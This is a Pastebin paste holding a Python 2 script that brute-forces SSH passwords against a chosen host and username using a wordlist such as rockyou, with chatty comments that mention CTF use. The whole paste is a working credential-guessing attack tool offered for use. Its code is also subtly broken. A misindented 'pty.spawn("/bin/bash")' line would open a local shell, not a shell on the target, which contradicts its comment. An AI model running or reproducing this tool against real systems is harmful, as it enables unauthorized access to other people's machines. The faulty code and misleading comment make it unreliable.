daily pastebin goal
2%
SHARE
TWEET

Untitled

Billbob Dec 15th, 2018 91 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. import sys, paramiko
  2.  
  3. target = raw_input("What is the address of the target? ")
  4. type(target)
  5. #asks for the ip address, set it as raw input because of the . in the ip address
  6.  
  7. username = raw_input("What is the username you want attacked? ")
  8. type(username)
  9. #raw username input incase someone tries to see if itll accept words and numbers
  10.  
  11. password_file = raw_input("What is the explicit path of the password file? ")
  12. type(password_file)
  13. #asks for the password file, set as raw input because i wanted it to be able to find say the rockyou files in /usr/share/wordlists if explicltly typed in
  14.  
  15. print "Attacking "+ target+ " with username "+ username+ " and passwords in file " +password_file
  16. #displays your choices back to you
  17.  
  18.  
  19.  
  20. def ssh(password, error_message =0):
  21. #creates a function, states the function takes one input, called password
  22.     try:
  23.         client = paramiko.SSHClient()
  24.         client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
  25. #complains that the host isnt in your trusted host thing if you dont have this line!
  26.  
  27.         client.connect(target, port=22, username=username, password=password)
  28. #makes a connection to the target specified above, using port 22, the username specified above, and the password fed to the function
  29.  
  30.     import pty; pty.spawn("/bin/bash")
  31. #this is a tricky piece of script i rely on HEAVILY when i do CTFs; it spwans a shell. so instead of just saying yes or no to the password, if it gets it right itll drop you into the machine!
  32.    
  33.     except paramiko.AuthenticationException:
  34.         error_message = 1
  35. #if the password is wrong set error_message to 1, so we can have the right line of text spat out
  36.  
  37.     client.close()
  38.     return error_message
  39.  
  40.  
  41.  
  42.  
  43. password_file = open(password_file)
  44.  
  45. for i in password_file.readlines():
  46.     password = i.strip("\n")
  47. #\n is a new line character, for some reason when python reads files it adds one in, so to get past this you literally tell it to strip the character when it finds it
  48.     try:
  49.         answer = ssh(password)
  50.  
  51.         if answer == 0:
  52.             print("Password for " +username+ " is "+password)
  53.             sys.exit(0)
  54.         if answer == 1:
  55.             print("Incorrect password " +password)
  56.  
  57.     except Exception, e:
  58.         print e
  59.         pass
  60.  
  61. password_file.close()
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top